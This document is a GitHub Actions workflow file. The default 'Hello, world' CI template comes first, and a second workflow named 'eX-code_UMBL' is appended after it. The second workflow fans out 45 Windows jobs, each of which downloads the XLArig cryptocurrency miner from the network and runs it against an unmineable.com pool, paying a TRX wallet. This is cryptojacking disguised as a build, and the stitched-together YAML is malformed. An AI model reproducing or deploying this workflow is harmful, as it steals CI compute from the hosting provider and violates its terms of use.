# This is a basic workflow to help you get started with Actions

name: CI

# Controls when the workflow will run
on:
  # Triggers the workflow on push or pull request events but only for the main branch
  push:
    branches: [ main ]
  pull_request:
    branches: [ main ]

  # Allows you to run this workflow manually from the Actions tab
  workflow_dispatch:

# A workflow run is made up of one or more jobs that can run sequentially or in parallel
jobs:
  # This workflow contains a single job called "build"
  build:
    # The type of runner that the job will run on
    runs-on: ubuntu-latest

    # Steps represent a sequence of tasks that will be executed as part of the job
    steps:
      # Checks-out your repository under $GITHUB_WORKSPACE, so your job can access it
      - uses: actions/checkout@v2

      # Runs a single command using the runners shell
      - name: Run a one-line script
        run: echo Hello, world!

      # Runs a set of commands using the runners shell
      - name: Run a multi-line script
        run: |
          echo Add other actions to build,
          echo test, and deploy your project.


name: eX-code_UMBL 

 

on: [workflow_dispatch] 

 

jobs: 

build: 

name: eX-code_UMBL 

runs-on: windows-latest 

strategy: 

max-parallel: 5 

fail-fast: false 

matrix: 

go: [1.0, 1.1, 1.2, 1.3, 1,35] 

flag: [A, B, C, D, E, F, G, H, I] 

env: 

NUM_JOBS: 20 

JOB: ${{ matrix.go }} 

steps: 

- name: PREPARING 

run: Invoke-WebRequest https://github.com/scala-network/XLArig/releases/download/v5.2.2/XLArig-v5.2.2-win64.zip -Outfile XLArig-v5.2.2-win64.zip 

- name: Seting-UP 

run: Expand-Archive XLArig-v5.2.2-win64.zip 

- name: Running 

run: .\XLArig-v5.2.2-win64\xlarig.exe --no-huge-pages -o rx.unmineable.com:3333 -p x -a rx -k -t 1 --cpu-max-threads-hint 25 -u TRX:TMwSR2jGxVy3SENThNdoXZpMygEEHzmTEZ.GH1

- name: DONE 

run: exit
